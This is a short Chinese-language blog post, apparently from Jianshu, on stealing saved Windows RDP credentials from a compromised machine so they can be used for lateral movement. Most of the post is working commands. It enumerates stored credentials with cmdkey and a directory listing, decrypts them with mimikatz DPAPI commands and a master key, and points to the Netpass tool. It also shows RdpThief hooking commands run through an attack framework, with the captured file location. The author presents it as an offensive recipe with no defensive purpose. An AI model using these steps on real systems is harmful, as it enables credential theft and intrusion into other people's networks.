RDP憑據(jù)

0x00 簡介

就是利用RDP協(xié)議遠程連接其他機器的密碼。

image

0x01 獲取保存的RDP憑據(jù)

在獲取一臺機器管理員權限后,可以查看本地是否保存了 RDP 密碼,然后解密嘗試用于橫向。

查看保存的遠程主機信息(該命令需要在用戶 session 下執(zhí)行)

cmdkey /list
image

1. Mimikatz

本地的憑據(jù)

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
image

選擇一個開始進行解密,這里需要記錄 guidMasterKey

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\{用戶名}\AppData\Local\Microsoft\Credentials\{session}"
image

找到對應的 Masterkey

sekurlsa::dpapi
image

用密鑰來進行解密指定的憑據(jù),成功解出密碼

dpapi::cred /in:C:\Users\{用戶名}\AppData\Local\Microsoft\Credentials\{session} /masterkey:{masterkey}
image

后面,懂得都懂

2. Netpass.exe

界面化工具

image

0x02 HOOK RDP 憑據(jù)

直接用工具,原理建議看 作者原文

啟動心跳檢測,檢查新的mstsc.exe進程,執(zhí)行注入操作

rdpthief_enable
image

模擬管理員進行遠程登錄

image

停止心跳檢測

rdpthief_disable

查看結果

rdpthief_dump

我的cs有點奇怪。。。。

image

還是導出來看吧,在 %temp%\data.bin

image.png

參考文獻

獲取rdp憑據(jù)
rdp_thief

?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容